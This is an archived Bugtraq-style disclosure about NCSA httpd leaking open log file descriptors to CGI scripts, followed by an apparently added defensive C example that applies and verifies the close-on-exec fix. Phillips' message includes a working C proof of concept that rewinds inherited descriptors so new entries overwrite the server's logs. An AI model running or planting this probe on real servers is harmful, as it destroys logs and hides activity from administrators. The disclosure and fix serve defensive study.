
NCSA httpd again: CGI scripts and log file descriptors



This is from the "bugtraq" list (see
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.htm#2616 and
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.htm#2742 for a couple of
httpd-related threads).

Would anyone care to comment on Phillips' speculation as to whether
this hole could do more than trash your logs?

Furthermore, assuming you have tight restrictions on the CGI scripts
you make available, is there any reason to believe that this could be
exploited by malicious *users* (as opposed to malicious CGI authors)?

-- Prentiss Riddle ("aprendiz de todo, maestro de nada") riddle@rice.edu
-- Systems Programmer and RiceInfo Administrator, Rice University
-- 2002-A Guadalupe St. #285, Austin, TX 78705 / 512-323-0708
--------------------------------------------------------------------------

On Apr 26, 11:43pm, Paul Phillips (paulp@CERF.NET) wrote:
} Subject: CGI script insecurity in NCSA httpd
}
} Greetings, all.  Anyone with access to CGI scripts on your server can
} destroy all your logfiles and possibly wreak other havoc.  The problem
} is that NCSA httpd does not close open file descriptors on exec, so
} CGI scripts still have access to all the originals.  If you need a 
} demonstration, run the following as a CGI on your server:
} 
} #include <errno.h>
} #include <stdio.h>
} #include <sys/types.h>
} #include <unistd.h>
} 
} #define OPEN_MAX 255	/* good enough :-) */
} 
} int main(int argc, char ** argv)
} {
}     int i;
} 
}     printf("Content-type: text/plain\n\n");
} 
}     /* Probe every descriptor number: lseek() succeeds only on an open,
}      * seekable fd, and fails with EBADF only on a closed one (an open but
}      * non-seekable fd such as a socket fails with ESPIPE and is reported
}      * too).  Any inherited log file is rewound to offset 0 by the probe. */
}     for(i = 0; i < OPEN_MAX; i++) {
}         if(lseek(i, 0, SEEK_SET) != -1 || errno != EBADF)
}             printf("I just reset fd %d.  Ha!\n", i);
}     }
}     return 0;
} }
} 
} Please note that this will reset all your logfiles to the beginning,
} causing new data to overwrite old data.  Other, equally entertaining
} things can be done with these open file descriptors.  The fix is to
} set the close-on-exec flag whenever a new file descriptor is allocated,
} especially when the log files are opened, as in
} 
}     fcntl(fd, F_SETFD, FD_CLOEXEC);
} 
} Since these file descriptors are open to root owned files, I pondered
} whether cracking root was possible.  It does not appear so, since fchmod
} checks the euid of the process even though it has an open descriptor,
} and this is normally "nobody".  HOWEVER, I have not given the matter an 
} enormous amount of thought, so a greater vulnerability may exist here.
} I welcome comments.
} 
} --
} Paul Phillips                                 EMAIL: paulp@cerf.net  
} WWW: http://www.primus.com/staff/paulp/       PHONE: (619) 220-0850
} 
} 
}-- End of excerpt from Paul Phillips
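The fix Phillips proposes, `fcntl(fd, F_SETFD, FD_CLOEXEC)`, and a way to verify it, as an added example that is not part of either message and not NCSA httpd code. It opens a log file both ways (leaky and with close-on-exec set), inspects the flag with `F_GETFD`, counts which descriptors a child would inherit without rewinding them the way the `lseek()` probe above does, and then fork/execs `/bin/sh` to confirm empirically which descriptor survives the exec. The function names, the `/tmp` log paths and the `": >&N"` shell check are this example's own assumptions.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* The leaky open: how a server that never sets close-on-exec hands its
 * log descriptor to every CGI process it exec()s.  Returns the fd or -1. */
int open_log_leaky(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_APPEND, 0640);
}

/* The fixed open: same file, then FD_CLOEXEC applied as in the post.
 * Existing FD flags are preserved; only the close-on-exec bit is added. */
int open_log_cloexec(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND, 0640);
    if (fd == -1)
        return -1;
    int flags = fcntl(fd, F_GETFD);
    if (flags == -1 || fcntl(fd, F_SETFD, flags | FD_CLOEXEC) == -1) {
        int saved = errno;
        close(fd);
        errno = saved;
        return -1;
    }
    return fd;
}

/* Inspect the flag: 1 = open and close-on-exec, 0 = open and inheritable,
 * -1 = not an open descriptor. */
int fd_has_cloexec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    if (flags == -1)
        return -1;
    return (flags & FD_CLOEXEC) ? 1 : 0;
}

/* Audit helper: how many descriptors in [first, last] would a child keep
 * across exec()?  Unlike the lseek() probe in the post, F_GETFD does not
 * touch file offsets, so this is safe to run against live log files. */
int count_inheritable_fds(int first, int last)
{
    int n = 0;
    for (int fd = first; fd <= last; fd++)
        if (fd_has_cloexec(fd) == 0)
            n++;
    return n;
}

/* Empirical check of what exec() actually does: fork, exec /bin/sh, and
 * have the shell redirect onto the descriptor.  ": >&N" exits 0 if fd N is
 * open in the exec'd image and fails with "Bad file descriptor" if not.
 * Returns 1 if the child still had the fd, 0 if not, -1 on error. */
int fd_survives_exec(int fd)
{
    char cmd[64];
    snprintf(cmd, sizeof cmd, ": >&%d", fd);
    pid_t pid = fork();
    if (pid == -1)
        return -1;
    if (pid == 0) {
        /* Silence the shell's error message; only the exit status matters. */
        int devnull = open("/dev/null", O_WRONLY);
        if (devnull != -1) {
            dup2(devnull, STDERR_FILENO);
            close(devnull);
        }
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) == -1)
        return -1;
    if (!WIFEXITED(status) || WEXITSTATUS(status) == 127)
        return -1;
    return WEXITSTATUS(status) == 0 ? 1 : 0;
}

int main(void)
{
    /* Constructed log paths for the demonstration. */
    int leaky = open_log_leaky("/tmp/cloexec_demo_leaky.log");
    int fixed = open_log_cloexec("/tmp/cloexec_demo_fixed.log");
    if (leaky == -1 || fixed == -1) {
        perror("open");
        return 1;
    }
    printf("leaky fd %d: cloexec=%d, survives exec=%d\n",
           leaky, fd_has_cloexec(leaky), fd_survives_exec(leaky));
    printf("fixed fd %d: cloexec=%d, survives exec=%d\n",
           fixed, fd_has_cloexec(fixed), fd_survives_exec(fixed));
    printf("descriptors 3..63 a CGI child would inherit: %d\n",
           count_inheritable_fds(3, 63));
    return 0;
}
```

The `F_GETFD` loop is the non-destructive form of the check: compiled as a CGI it lists the descriptors the server leaked without resetting anyone's logs. On systems that support it, passing `O_CLOEXEC` to `open()` (POSIX.1-2008) sets the flag atomically and avoids the window between `open()` and `fcntl()` in which a concurrently forked child could still inherit the descriptor.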

